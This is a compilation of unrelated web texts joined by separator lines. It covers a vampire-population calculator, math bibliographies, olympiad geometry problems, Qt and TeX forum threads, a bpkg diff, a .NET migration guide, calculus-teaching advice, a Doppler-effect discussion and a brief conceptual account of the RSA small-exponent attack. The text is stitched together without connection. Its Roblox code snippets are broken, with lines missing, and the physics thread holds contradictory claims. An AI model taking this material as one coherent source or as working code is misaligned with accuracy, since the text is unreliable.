A similar situation exists with humans (prey) and vampires (predators). Our calculator makes use of the Lotka - Volterra equations, with a few modifications. First of all, we created some vampire slayers that control the population of vampires. Secondly, we gave each group a special ability that is implemented indirectly in the algorithm. Eventually, we came up with the following differential equations:
\begin{align*} \frac{\mathrm{d}x}{\mathrm{d}t} &= x \left(\mathrm{k_1} - \mathrm{a_1} y\right) \\[10pt] \frac{\mathrm{d}y}{\mathrm{d}t} &= y \left(\mathrm{b_1 a_1} x + \mathrm{b_2 a_2}y - \mathrm{c}z\right) \\[10pt] \frac{\mathrm{d}z}{\mathrm{d}t} &= z \left(\mathrm{k_2} - \mathrm{a_2} y\right) \\[10pt] \end{align*}
where:
• $x$, $y$, and $z$ are the sizes of the human, vampire, and vampire slayers populations respectively.
• $\mathrm{k_1}$ and $\mathrm{k_2}$ are the growth rates of the human and vampire slayer populations.
• $\mathrm{b_1}$ and $\mathrm{b_2}$ are the probabilities that a human and a vampire slayer will turn into a vampire.
• Coefficients $\mathrm{a_1}$, $\mathrm{a_2}$, and $\mathrm{c}$ describe the aggression levels: vampire towards a human, vampire towards vampire slayer, and vampire slayer towards vampire respectively.
For more explanations, read the , an article published in Applied Mathematical Sciences. We based this calculator on the fourth-order Runge-Kutta method to solve the problem of differential equations.
## Bloodsuckers - are vampires among us?
There are species in the animal kingdom that suck and feed on prey's blood. We call this practice hematophagy, and many small animals prefer it since blood is basically a fluid tissue rich in nutrients. What's the main difference between animal bloodsuckers and fictitious vampires? The former can't turn a victim into another creature by biting or killing it. Lucky for us! Some known bloodsucking animals are:
• Vampire Bats - they mainly hunt birds and reptiles, but they occasionally turn their fangs on humans. Interestingly, vampire bats often share the blood that they have sucked with their hungry compatriots. That's a real friendship!
• Leechs - bloodsucking worms that live in water. They can be used medicinally, as they can restore blood flow to damaged veins.
• Vampire Finches - don't let these lovely looking birds deceive you! When other food sources are scarce, they sometimes feed by drinking the blood of other bigger birds.
• Mosquitoes - flying insects that you're probably familiar with. They can be dangerous to humans since mosquitoes can carry many diseases. An interesting fact is that only female mosquitoes suck blood from their victims (they need it to fuel egg production).
Humans also practice hematophagy! There are meals that contain animal blood. For example, some societies around the world eat blood sausages - sausages filled with blood that has been cooked or dried. With that, we can conclude that vampires are actually among us! (of course, it's only a half-truth; real bloodsuckers can't turn people into vampires).
🙋 How would you grade this calculator? with an A? or an A+? 😅 With the test grade calculator you can find out the equivalence of grades in letters and percentages.
Dominik Czernia, PhD
Select a scenario
Stoker-King model
Inspired by Bram Stoker's Dracula and Stephen King's Salem's Lot.
In 1897 (the year Stoker's novel was first published) the world population was about 1,650 million people. In this scenario we assume only one vampire at the beginning. The vampire attacks a victim that eventually becomes another vampire.
Humans
Initial population
Transformation probability
%
Annual population growth
current (1% per year)
Smaller populations grow faster
no
Vampires
Initial population
vs. humans
common attacks
vs. slayers
no attacks
Smart vampires
no
Vampire slayers
Initial population
Annual recruitment speed
no recruitment
vs. vampires
no attacks
Transformation probability
%
Vampire slayers members limit
no
Changes in populations
Time scale
months
Chart scale
linear
The selected scenario is an example of an epidemic outbreak that might be caused by a deadly virus 😷. The increase in vampire population inevitably leads to the demise of mankind. The 13th month is the crucial point, where the explosive growth of vampires wipes out mankind in about half a year.
It's all over. The expansion of vampires is unstoppable 🧛. Bloodsuckers have control of the world, killing the last human after 30.8 months ⚰️. But don't lose hope! Try to recruit some vampire slayers and save mankind 💪.
The below graph shows the exact sizes of each population.
Did you find a set of parameters that creates an incredible story? Share it with us and your friends using the Send this result button below!
People also viewed…
### Body fat
Use the body fat calculator to estimate what percentage of your body weight comprises of body fat.
### Coffee kick
A long night of studying? Or maybe you're on a deadline? The coffee kick calculator will tell you when and how much caffeine you need to stay alert after not sleeping enough 😀☕ Check out the graph below!
### Millionaire
This millionaire calculator will help you determine how long it will take for you to reach a 7-figure saving or any financial goal you have. You can use this calculator even if you are just starting to save or even if you already have savings.
|
Équations hyperboliques non linéaires
Séminaire Équations aux dérivées partielles (Polytechnique) dit aussi "Séminaire Goulaouic-Schwartz" (1977-1978), Exposé no. 18, 18 p.
@article{SEDP_1977-1978____A19_0,
author = {Tartar, L.},
title = {\'Equations hyperboliques non lin\'eaires},
journal = {S\'eminaire \'Equations aux d\'eriv\'ees partielles (Polytechnique) dit aussi "S\'eminaire Goulaouic-Schwartz"},
note = {talk:18},
publisher = {Ecole Polytechnique, Centre de Math\'ematiques},
year = {1977-1978},
zbl = {0385.35044},
mrnumber = {504147},
language = {fr},
url = {http://archive.numdam.org/item/SEDP_1977-1978____A19_0/}
}
Tartar, L. Équations hyperboliques non linéaires. Séminaire Équations aux dérivées partielles (Polytechnique) dit aussi "Séminaire Goulaouic-Schwartz" (1977-1978), Exposé no. 18, 18 p. http://archive.numdam.org/item/SEDP_1977-1978____A19_0/
R. Courant, K.O. Friedrichs: Supersonic flow and shock waves. Interscience Publ. New York (1948). | MR 29615 | Zbl 0041.11302
Les contributions importantes de l'école américaine de 1957 à 1970: P.D. Lax: Hyperbolic systems of conservation laws. Comm. Pure Appl. Math. 10 (1957) 537-566. | Zbl 0081.08803
P.D. Lax: Development of singularities of solutions of non linear hyperbolic partial differential equations. J. Math. Phys. 5 (1964) 611-613. | MR 165243 | Zbl 0135.15101
J. Glimm: Solutions in the large for non linear hyperbolic systems of equations. Comm. Pure Appl. Math. 18 (1965) 697-715. | MR 194770 | Zbl 0141.28902
J. Glimm, P.D. Lax: Decay of solutions of systems of non linear hyperbolic conservation laws. Memo. Amer. Math. Soc. 101 (1970). | MR 265767 | Zbl 0204.11304
O.A. Oleinik: On the uniqueness of the generalized solution of the Cauchy problem for a non linear system of equations occurring in mechanics. Usp. Mat. Nauk 12 (78) (1957) 169-176. | MR 94543 | Zbl 0080.07702
S.K. Godunov: Bounds on the discrepancy of approximate solutions constructed for the equations of gas dynamics. Zhur Vychisl. Mat i Fiz 1 (1961) 623-637. | MR 148242 | Zbl 0133.19803
A.I. Volpert: The spaces BV and quasilinear equations. Mat. Sb 73 (1967) 255-302. | MR 216338 | Zbl 0168.07402
S.N. Kruzhkov: First order quasilinear equations in several independent variables. Mat. Sb. 81 (1970) 228-255. | MR 267257 | Zbl 0202.11203
P.D. Lax: Shock waves and entropy dans Contribution to Nonlinear Functional Analysis, ed. par E. A. Zarantonello, Academic Press, New York (1971) 603-634. | MR 393870 | Zbl 0268.35014
C.C. Conley, J.A. Smoller: Shock waves as limits of progressive wave solutions of higher order equations. Comm. Pure Appl. Math. 24 (1971) 459-472. | MR 283414 | Zbl 0233.35063
C.M. Dafermos: The entropy rate admissibility criterion for solutions of hyperbolic conservation laws. J. Diff. Eq. 14 (1973) 202-212. | MR 328368 | Zbl 0262.35038
C.C. Conley, J.A. Smoller: On the structure of magnetohydrodynamic shock waves. Comm. Pure Appl. Math. 27 (1974) 367-375. | MR 368586 | Zbl 0284.76080
|
# Geometry (Thailand Math POSN 2nd round)
Write a full solution.
1. Let $H$ be orthocenter of $\triangle ABC$ and point $I,J,K$ be a midpoint between each vertex $A,B,C$ and $H$ respectively. If $P$ is a point on circumcircle of $\triangle ABC$ not on the vertex $A,B,C$, and $M$ be the midpoint between $P,H$. Prove that $I,J,K,M$ lie on the same circle.
2. Let the tangents of circumcircle of $\triangle ABC$ at point $B,C$ intersect at point $D$. Prove that $\overline{AD}$ is symmedian line of $ABC$.
3. Let $P,Q$ be 2 points that are isogonal conjugate to each other in $\triangle ABC$. If $\overline{PP_{1}}$ and $\overline{QQ_{1}}$ is perpendicular to $\overline{BC}$ at point $P_{1}$ and $Q_{1}$ respectively, $\overline{PP_{2}}$ and $\overline{QQ_{2}}$ is perpendicular to $\overline{CA}$ at point $P_{2}$ and $Q_{2}$ respectively, and $\overline{PP_{3}}$ and $\overline{QQ_{3}}$ is perpendicular to $\overline{AB}$ at point $P_{3}$ and $Q_{3}$ respectively. Prove that $P_{1},P_{2},P_{3},Q_{1},Q_{2},Q_{3}$ lie on the same circle, and the center of that circle lies in the midpoint of $P$ and $Q$.
4. Let $I,N,H$ be the center of incircle, nine-point circle, and orthocenter of $\triangle ABC$ respectively. Construct $\overline{ID}, \overline{NM}$ perpendicular to $\overline{BC}$ at point $D,M$ respectively. If $\overline{AH}$ intersect circumcircle of $\triangle ABC$ at point $K$ such that $Y$ is a midpoint of $\overline{AK}$. Prove that $|ID - NM| = \displaystyle \left |r - \displaystyle \frac{AY}{2}\right|$ where $r$ is an inradius of $\triangle ABC$.
5. Let $U$ be a foot of altitude of $\triangle ABC$ from point $A$. If $U',U''$ are reflection of $U$ by $\overline{CA},\overline{AB}$ respectively, such that $\overline{U'U''}$ intersect $\overline{CA},\overline{AB}$ at point $V,W$ respectively. Prove that $\overline{BV},\overline{CW}$ is perpendicular to $\overline{CA},\overline{AB}$ respectively.
This note is a part of Thailand Math POSN 2nd round 2015.
Note by Samuraiwarm Tsunayoshi
5 years, 10 months ago
This discussion board is a place to discuss our Daily Challenges and the math and science related to those challenges. Explanations are more than just a solution — they should explain the steps and thinking strategies that you used to obtain the solution. Comments should further the discussion of math and science.
When posting on Brilliant:
• Use the emojis to react to an explanation, whether you're congratulating a job well done , or just really confused .
• Ask specific questions about the challenge or the steps in somebody's explanation. Well-posed questions can add a lot to the discussion, but posting "I don't understand!" doesn't help anyone.
• Try to contribute something new to the discussion, whether it is an extension, generalization or other idea related to the challenge.
MarkdownAppears as
*italics* or _italics_ italics
**bold** or __bold__ bold
- bulleted- list
• bulleted
• list
1. numbered2. list
1. numbered
2. list
Note: you must add a full line of space before and after lists for them to show up correctly
paragraph 1paragraph 2
paragraph 1
paragraph 2
[example link](https://brilliant.org)example link
> This is a quote
This is a quote
# I indented these lines
# 4 spaces, and now they show
# up as a code block.
print "hello world"
# I indented these lines
# 4 spaces, and now they show
# up as a code block.
print "hello world"
MathAppears as
Remember to wrap math in $$ ... $$ or $ ... $ to ensure proper formatting.
2 \times 3 $2 \times 3$
2^{34} $2^{34}$
a_{i-1} $a_{i-1}$
\frac{2}{3} $\frac{2}{3}$
\sqrt{2} $\sqrt{2}$
\sum_{i=1}^3 $\sum_{i=1}^3$
\sin \theta $\sin \theta$
\boxed{123} $\boxed{123}$
Sort by:
The first question can be solved using homothety. The points A,B,C and P lie on the circumcircle. So consider a homothetic transformation of the circumcircle about orthocenter and shrink the circle to half of its radius. The mid points of H and A,B,C, P will lie on this circle. This is the nine point circle of the triangle.
- 5 years, 1 month ago
Hi Pranav I do I know you ? I know a Pranav Rao and he is from mumbai too. This is shrihari.
- 5 years, 1 month ago
|
0
# I am trying to make a random colored head but it doesn't work?
I'm trying to make it so when the user joins, they will have a random colored head. Here's my script
local Player = game:GetService("Players")
end)
1
Edited 1 year ago
There is a typo on line 3, do this instead:
player.Character.Head.BrickColor = BrickColor.random()
remember that function calls are case-sensitive
edit: you should also do this every time the player's character is added because as it stands it will do one of two things:
• give an error because the player is added before the character is
• if the character exists, this will only happen once and if the person dies, resets their character, etc. their head will go back to normal
so try this:
local Player = game:GetService("Players")
end)
end)
0
it still doesn't work. It's a localscript in ServerScriptService. CountOnMeBro 51 — 1y
0
LocalScripts run on the client side and do not work under ServerScriptService. Put this in a regular (server-side) script. You should use Scripts for things you want everyone in the game to see (so, most things), and LocalScripts are mainly for GUIs and other things that are unique to each person OfficerBrah 494 — 1y
0
i put a script in ServerScriptService and it still doesnt work CountOnMeBro 51 — 1y
0
I tested this in Studio and it works when you put wait() before line 4, so I guess Roblox overrides the head's color when the character is initially created and that's why it doesn't work without the wait() OfficerBrah 494 — 1y
0
local Char = game.Players.LocalPlayer.Character
|
# QT Programming with Debian or Ubuntu Linux - a problem
1. Jun 18, 2008
### Pollywoggy
I am running Kubuntu Hardy Heron and I have the same problem I had with Debian, that the Qt packages put the libs and includes all over the place, not in one place such as /usr/lib and /usr/include
This means that I can't set QTDIR unless I obtain the Qt sources and compile and install in /usr/local/qt but that is a waste of disk space.
Is there a way to get source code requiring Qt to compile without having to install a second Qt?
2. Jun 18, 2008
### shoehorn
This sounds strange. Firstly, no, you don't need to compile Qt from source in order to install the libraries. Synaptic should have a list of the Qt packages - make sure you install the dev packages as well.
As far as I can recall, Hardy places Qt in /usr/share/qt4 (there are also Qt3 libraries in /usr/share/qt3, but presumably you're working with the latest Qt and don't need these). You don't say precisely what it is that you need to know $QTDIR for, but I'll assume you're trying to compile some sources that rely on the Qt libraries. Have you tried passing Code (Text): ./configure --with-qtdir=/usr/share/qt4 prior to building? There are symlinks in that directory that tell the compiler that the Qt libraries and includes are in /usr/share/lib and /usr/share/include. Alternatively, you could always just set$QTDIR to the above in your .bashrc.
3. Jun 18, 2008
### Pollywoggy
It's not a problem when I am compiling source code that comes with a configure script, the script knows where to find the libs and includes. It is a problem when I try to compile code from a tutorial or book.
I am going to try your suggestion of setting QTDIR to /usr/share/qt4
thanks
4. Jun 18, 2008
### Pollywoggy
I think I am on the right track now and all the compile errors have to do with KDE and not Qt.
This means I need to do for KDE something along the lines of what I did for Qt, following the ideas you gave.
thanks
5. Jun 18, 2008
### Pollywoggy
Solved
I set KDEDIR to /usr/lib/kde4 and this did the trick. I will put that in my ~/.bashrc and the QTDIR as well and also add the $QTDIR/bin and$KDEDIR/bin to my PATH.
6. Jun 18, 2008
|
aboutsummaryrefslogtreecommitdiff log msg author committer range
path: root/bpkg/pkg-build.cli
diff options
context: 12345678910152025303540 space: includeignore mode: unifiedssdiffstat only
Diffstat (limited to 'bpkg/pkg-build.cli')
-rw-r--r--bpkg/pkg-build.cli43
1 files changed, 25 insertions, 18 deletions
diff --git a/bpkg/pkg-build.cli b/bpkg/pkg-build.cliindex e247f47..0ac8dcb 100644--- a/bpkg/pkg-build.cli+++ b/bpkg/pkg-build.cli@@ -13,7 +13,8 @@ namespace bpkg { " - + + ",@@ -25,12 +26,13 @@ namespace bpkg \b{bpkg pkg-build}|\b{build} [] \ \b{--upgrade}|\b{-u} | \b{--patch}|\b{-p}\n \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ [... \b{--}]} - \c{ = [](([\b{:}][\b{/}])\b{,}...[\b{@}] | \n- \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ [\b{@}] \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ | \n- \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ | \n+ \c{ = [](([\b{:}][])\b{,}...[\b{@}] | \n+ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ [\b{@}] \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ | \n+ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ | \n \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \b{/})\n- \ \ \ \ = \b{?}\n- \ \ = \b{sys}}+ \ \ \ \ \ \ = \b{?}\n+ \ \ \ \ = \b{sys}\n+ \ \ \ = \b{/} | } \h|DESCRIPTION| @@ -56,21 +58,25 @@ namespace bpkg or \cb{--patch}. Each package can be specified as just the name () with optional- package version () in which case the source code for the package- will be automatically fetched from one of the configured+ version specification (), in which case the source code for the+ package will be automatically fetched from one of the configured repositories. See the \l{bpkg-rep-add(1)} and \l{bpkg-rep-fetch(1)}- commands for more information on package repositories. If is not- specified, then the latest available version will be built. To downgrade,- the desired version must be specified explicitly. For example:+ commands for more information on package repositories. The version+ specification () can be either the exact version in the+ \c{\b{/}\i{version}} form or the version constraint as described in+ \l{bpkg#package-version-constraint Package Version Constraint}. If+ is not specified, then the latest available version will be+ built. To downgrade, the desired version must be specified+ explicitly. For example: \- bpkg build foo libfoo/1.2.3+ bpkg build foo libfoo/1.2.3 \"bar < 2.0.0\" \ Alternatively, the package repository location () can be- specified as part of the build command. In this case, if is not- specified, then the latest available from this repository version will be- built. For example:+ specified as part of the build command. In this case, if is+ not specified, then the latest available from this repository version+ will be built. For example: \ bpkg build foo,libfoo/1.2.3@https://git.example.org/foo.git#master@@ -91,8 +97,9 @@ namespace bpkg (). Currently the only recognized scheme is \cb{sys} which instructs \cb{pkg-build} to configure the package as available from the system rather than building it from source. If the system package version- () is not specified or is '\cb{*}', then it is considered to be- unknown but satisfying any dependency constraint. If the version is not+ () is not specified or is '\cb{/*}', then it is considered to+ be unknown but satisfying any version constraint. If specified,+ may not be a version constraint. If the version is not explicitly specified, then at least a stub package must be available from one of the repositories. @@ -125,7 +132,7 @@ namespace bpkg available for build as a dependency. Packages (both built to hold and as dependencies) that are specified with- an explicit package version () or as an archive or directory,+ an explicit package version () or as an archive or directory, will have their versions held, that is, they will not be automatically upgraded.
|
# [tex-live] Problem reinstalling TexLive
Nicolas Richard theonewiththeevillook at yahoo.fr
Wed Jul 4 14:42:46 CEST 2012
Marc Doroja <marcdoroja at yahoo.com> writes:
> http://i206.photobucket.com/albums/bb184/Chemicalist011/texliveprob.png
>
> I have tried changing my PATH variables
The current PATH variable you have seems broken to me, it does not point
to anything that could contain the usual executables of windows.
In fact, you should not need to play with the PATH variable (the TL
installer takes care of it for you afaik) but if you do play with it in
a script then it's something like PATH=%path%;c:\new\path\ (note the
first part, %path%, which ensures that you are not overwriting the
previous definition), but "the way to do it" on windows 7 is via some
dialog (google "change path windows 7" for the steps).
hth
--
N.
|
# Small exponent attack¶
This is one of the simplest attacks on RSA which arises when m^e is less than n(Note:Here m is the message,e the exponent and n the modulus).When this is the case, the modulo n loses it's significance and the encryption reduces to m^e (Note: normal encryption is (m^e)%n).Thus ciphertext becomes m^e which implies m is the eth root of ciphertext(eg:2^4=16 implies 2 is the fourth root of 16).
|
# Migrate from .NET Core 2.0 to 2.1
This article shows you the basic steps for migrating your .NET Core 2.0 app to 2.1. If you're looking to migrate your ASP.NET Core app to 2.1, see Migrate from ASP.NET Core 2.0 to 2.1.
For an overview of the new features in .NET Core 2.1, see What's new in .NET Core 2.1.
## Update the project file to use 2.1 versions
• Open the project file (the *.csproj, *.vbproj, or *.fsproj file).
• Change the target framework value from netcoreapp2.0 to netcoreapp2.1. The target framework is defined by the <TargetFramework> or <TargetFrameworks> element.
For example, change <TargetFramework>netcoreapp2.0</TargetFramework> to <TargetFramework>netcoreapp2.1</TargetFramework>.
• Remove <DotNetCliToolReference> references for tools that are bundled in the .NET Core 2.1 SDK (v 2.1.300 or later). These references include:
In previous .NET Core SDK versions, the reference to one of these tools in your project file looks similar to the following example:
<DotNetCliToolReference Include="Microsoft.EntityFrameworkCore.Tools.DotNet" Version="2.0.0" />
Since this entry isn't used by the .NET Core SDK any longer, you'll see a warning similar to the following if you still have references to one of these bundled tools in your project:
The tool 'Microsoft.EntityFrameworkCore.Tools.DotNet' is now included in the .NET Core SDK. Here is information on resolving this warning.
Removing the <DotNetCliToolReference> references for those tools from your project file fixes this issue.
|
# Theorems of large deviations in the approximation by an infinitely divisible law
## Bibtex
@article{CIS-152978,
Author = {Aleskeviciene, A. and Statulevicius, V. and Aleškevičien\dot{e}, A. and Statulevičius, V.},
Title = {Theorems of large deviations in the approximation by an infinitely divisible law},
Journal = {Acta Applicandae Mathematicae},
Volume = {58},
Year = {1999},
Pages = {61--73},
Keywords = {Large deviations}
}
|
# What is the ideal teaching style for Calculus exercises only?
A Calculus class for 1st year students may have two subclasses (with two different lecturers) :
• The main class (which covers the theories and concept),
• and the 'response' class (which provides and explain how to solve problems in exercises)
For the latter, what is the ideal way to teach?
Some logical ideas that have been think of are :
• Give them problems (homework) and call some students forward to work on the board in the next meeting
• Give open book quizzes (open book so that the students are also studying at the same time)
• Give problems and explanation as many as possible? (sometimes does this makes students lazy or not..?)
• Some facts : several students that rarely focus on the lecture (skip classes, or even working on other things inside the class) have higher grades. I presume that online resources (such as Khan Academy, Youtube, ... works better for them?
• Use slides or the board?
Thanks.
• "Some facts : several students that rarely focus on the lecture (skip classes, or even working on other things inside the class) have higher grades. I presume that online resources (such as Khan Academy, Youtube, ... works better for them?" Rather than online videos, they may be working problems from the textbook. Or they may just be students with prior experience...common nowadays. – guest Mar 23 '18 at 22:23
• Your question feels very broad--so many subquestions related to what is called "discussion section" in the US. Is this a theoretical question or related to your job? What country and level of school? Also, how much of a time split is there between the main lectures and the discussion sections. And is any problem solving work being done in the main lectures or is it purely derivations and theory: it affects if you can do less examples and more practice in discussion sections. – guest Mar 23 '18 at 22:27
• @guest thanks. The response class is only 2 hours in 1 meeting per week, the main class is 3 hours in 1 meeting per week. The focus is on the ideal / best known ways, undergraduate level. – Arief Anbiya Mar 25 '18 at 18:23
• When solving problems (point 3) I oftentimes combine real solutions with fallacious ones and ask them to figure out what went wrong. For example, one can calculate $\lim_{x \to \infty} \frac{x + \cos x}{x} = 1$; however, applying L'Hôpital leads to $\lim_{x \to \infty} 1 -\sin x$ which does not exist. Hence, we "prove" that $1$ does not exist. This usually grabs the attention of students that get bored by solving problems and promotes the thought-process when asked to figure out "what went wrong" (either in-class or homework). – Rodrigo Zepeda Mar 30 '18 at 0:29
• @RodrigoZepeda thanks. But another problem would be the students sometimes disengaged if they meet something that is quite "intimidating", also they like to talk to each other so much. I think i can scale your example.. – Arief Anbiya Mar 31 '18 at 16:09
My approach would likely be as follows:
1. Reserve time for questions. In my experience this will not actually take much of the time. Don't be afraid to not answer certain questions. For example, "what do you think is on the next test" is usually not wise to entertain. Unless you are writing the test and have a specific sense of how to use that question to leverage studying. For example, I will sometimes ask in return, "well, tell me something you're not done studying".
2. Prepare a few examples to give lecture style. Perhaps just 1/3 of the time for this, but it assures there is real content delivered. This could be at the beginning, middle or end, in fact all three of these can be rearranged as you see fit for your audience and setting.
3. Put all the students names on 3x5 cards. Write about 5-10 problems on the board and randomly select names to work those problems. Give them 10 or so minutes and emphasize that everybody should be trying to work through the problems to follow along. When the time is up, go through the problems critiquing both answers and presentation. Mark the cards with dates and short description for your record. Next time, go to new students, or for fun repeat to keep them on their toes. Eventually everybody comes up front to work problems in this fairly low-pressure setting. This works best if you have some course points to assign. If you have no influence over their grade then sadly I have not much hope. I mean, try talking to people anywhere about math for 2 hours when you have no control over their grade. You'll find yourself alone in a room long before the end. (statistically, people are rarely mathematicians, so the sentence before is said in that manner of thinking)
The benefit of 3. is it gives them incentive to work on the class regularly and it gives you a chance to warn against common mistakes and/or to show better ways to solve the given problems. Finally, it is probably useful for the students to see that everybody (for the most part) struggles with the material. Too often students refuse to ask questions because they think they are alone in their confusion. In fact, the confusion is the rule. Ideally, this process helps some of the students to start asking good questions. We probably need to teach them what is a "good question", but I'll leave that for another post.
• Awesome tactical suggestions. Moral plus one. – guest Mar 26 '18 at 3:01
• @guest thanks. I've been toying with this technique this semester (3.) It works annoyingly well, or I have a really good class, not sure which yet. – James S. Cook Mar 26 '18 at 3:03
• "ride the winning horse" ;-) – guest Mar 26 '18 at 3:43
• @TheChef i am 8 years difference with the students, would it still be effective..? I usually give homeworks, but very few that wants to come forward in class to show their solutions. How do u handle uncooperative students, especially in class? – Arief Anbiya Mar 26 '18 at 14:19
• Arief: Do problems in class and call on students or bring them to the board. You don't have to do it 100% of the time, but do enough to get them involved. This also uses their time effectively. They are actually practicing IN CLASS. Remember they do not have unlimited time outside of class. – guest Mar 29 '18 at 16:01
1. To the extent the class does not cover problem solving, you should cover a a few in lecture style as examples. I don't totally believe (maybe don't want to believe) that the regular class is all derivations and theory and no example problems. But if so, definitely showing some examples would be helpful.
2. Emphasis even in case of 1, should be on drill still though. Pop quizzes, work together assignments, kids to the board, etc.
3. When explaining example problems, you will need to be efficient. Don't have time to cover all, so cover things that get messed up most often or are most likely to be covered on tests.
4. I would keep the tone in your section more collaborative and informal and friendly than the normal class. More "buddy telling you how to get it done" and less "herr doktor professor". Students love feeling like they are getting the inside scoop and cutting through the pretensions.
5. Use the board rather than slides. If you want super extra credit A+ points, than compose your remarks ahead of time. But still do the exposition on the board, rather than slides. Slides are a crutch. And they are so much different in connection than writing as you go. When you show slides, it's like showing the book. When you write on the board, you are a fellow warrior fighting in the trenches. Maybe a little bit better of one. But still "in the fight".
6. Talk to other TAs and get their experience. Coming here was a nice step. But do it IRL. And get to the nitty gritty (time management, discipline, loudness, handwriting, etc.) Not just high level stuff.
7. You avoided the question about country and student ability. Realize that some issues of pedagogy are the same from CalTech to RN JuCo. But in other cases, it makes a difference what the student limitations are in brains, desire, time, prep, etc. Think about these variables. Pedagogy is not a linear y(x) function but nonlinear, multifunction and full of stochastic noise (and student ability, etc. are confounding variables to some sort of same for everyone solutuon)
|
# Doppler Effect
1. Aug 16, 2005
### cscott
Why is it that the extent of the doppler effect on sound depends on whether, for example, you are moving towards the source or the source is moving towards you? Why does this not happen for light?
2. Aug 16, 2005
### Staff: Mentor
It does happen for light (how do you think that cop knew how fast you were driving?). But since the speed of light is a lot faster than the speed of sound, you have to be moving a lot faster (or have sensitive equipment) to notice it.
3. Aug 16, 2005
### cscott
The book I'm reading seems to tell otherwise but maybe I'm interpreting it wrong:
Nigel Calder's "Einstein's Universe"
Last edited: Aug 16, 2005
4. Aug 17, 2005
### Staff: Mentor
I don't think that first paragraph is correct. A quick google shows that the doppler shift equation for sound doesn't differentiate who is really moving.
There is a difference, in that velocities don't add in Einstein's relativity in the same way as in Newton's. But that doesn't appear to be what he means.
Anyone else have any insight....?
Last edited: Aug 17, 2005
5. Aug 17, 2005
### rbj
not really insight, but just a vote: i don't think that "the extent of the doppler shift depends on whether the source of the sound is moving towards the listener or the listener is moving towards the source of sound" is "ecause sound waves travel throught a medium - the air". the doppler shift is because of how the actual oscillation of whatever source is observed at a distance from the POV of the speed of the propagation of the resulting wave. relative doppler has the added effect that the observed frequency of oscillation would also be different than from only a classical POV.
whatever.
6. Aug 17, 2005
### Chronos
Redshift related Doppler shift discrepancies are still of interest. Lorentz invariance remains under the magnifying glass.
7. Aug 17, 2005
### Zelos
the doppler effect accure all the time waves exist. light and sound are waves so it will happen for them
8. Aug 17, 2005
### Meir Achuz
"The precise reckoning of the doppler effect was a matter of great importance to Einstein, and he found that light did not behave in exactly the same way as sound. Because sound waves travel throught a medium - the air - the extent of the doppler shift depends on whether the source of the sound is moving towards the listener or the listener is moving towards the source of sound.
[...] In Einstein's democratic universe, that cannot make any difference: all that matters is he relative speed of the start and the onlooker."
These two quotes state the correct situation.
The details of the difference depend on the different derivations
(and can be seen in the formula for each case), but the basic difference is that there is a medium for air, and not for light.
9. Aug 17, 2005
### rbj
if the author means "velocity" (as a vector) instead of speed, then i agree. but the doppler effect on light coming from a source moving toward an observer will be different than the doppler effect from the same source moving away from the observer at the same speed. red shifting is different than blue shifting.
the effect that speed has on the rate of oscillation creating the light wave as observed from the observer is independent of direction. it's, $$\sqrt{1-v^2/c^2}$$, a function of $$|v|^2$$, the magnitude of the velocity vector.
we agree on that.
Last edited: Aug 17, 2005
10. Aug 17, 2005
### cscott
I don't know if this makes any difference or not, but the author goes on to talk about the discrepancy of redshifts and blueshifts with respect to energy. In the end he's using all this to describe Einstein's line of thought when coming up with $E=mc^2$.
11. Aug 17, 2005
### rbj
i dunno what Einstein's line of thought was to get $E = m c^2$, but the way it was done in my sophmore physics book was, after time dilation, length contraction, and relativistic mass (the Lorentz transformations, IIRC) are figgered out, the question was asked: in a known force feild, how much energy does it take to accelerated a body of rest mass $m_0$ to a velocity of $v$ considering that the mass is increasing with increasing velocity and force is
$$F = \frac{dp}{dt} = \frac{d(mv)}{dt} = m\frac{dv}{dt} + v\frac{dm}{dt}$$
and you get an answer for
kinetic energy: $$T = \left( \frac{m_0}{\sqrt{1-v^2/c^2}} - m_0 \right) c^2$$
or
$$T = m c^2 - m_0 c^2 = E - E_0$$
where $E = m c^2$ is interpreted as the "total energy" and $E_0 = m_0 c^2$ is interpreted as the "rest energy". the difference beint "kinetic energy".
dunno how others learned it.
12. Aug 18, 2005
### Meir Achuz
I will have to give the relativistic formula for the Doppler shift:
w'=w gamma[1+(v/c) cosA], where v is the speed of the star and A is the angle between the star's velocity and the line from the star to you, all in your rest system. The formula is the same whether you or the star is moving, but the light is always observed by you in your rest system.
Last edited: Aug 18, 2005
13. Aug 18, 2005
### rbj
i dunno what "gamma" is (Gamma function??) but the $1 + |v|/c \cos(A)$ does not contradict what i thought i was saying. $|v| \cos(0)$ is the opposite sign as $|v| \cos( \pi )$ which means that red shifting is different than blue shifting. and it should not matter who is moving, since it is relative. neither the observer nor the star have any absolute claim on being the unique stationary position.
edit: i know what $$\gamma = \left( 1 - v^2/c^2 \right)^{-\frac{1}{2}}$$ is. just didn't recognize the term at first.
Last edited: Aug 19, 2005
14. Sep 4, 2010
### cragar
The Doppler effect of sound does depend on who is moving. If I were to move backwards at a speed a little greater than the speed of sound from a speaker I would out run the sound and never hear it. But if I moved the speaker back and the same speed i would eventually hear the sound.
|
``` > Maybe BibTeX-like syntax will work, i.e. something like \author{Albert
> Einstein} and \author{Einstein, Albert} would produce same output
> determined *only* by house class? Then house classes could process
> \author declarations and extract, if required, both Albert Einstein in
> title page and A.~Einstein in the running head?
>
> Actually BibTeX has a very subtle algorithm of dealing with author names;
> I think it is possible to reimplement it in TeX for journal styles.
While I (sort of) admire BibTeX's system for second-guessing surnames,
I have always found it confusing as an author, and as a processor of
other peoples .bib files. I think a clean separation into surname and
other bits is better. That does not mean you cannot give a simple case
like
\author{name=Sebastian Rahtz}
and have it parsed easily by TeX as if you had typed
\author{surname=Rahtz, forenames=Sebastian Patrick Quintus} [1]
but it goes further than that, doesn't it. some styles will need to
suppress that to S.P.Q., others want the full name. you cannot always
work out that initial compression easily, by the way - people called
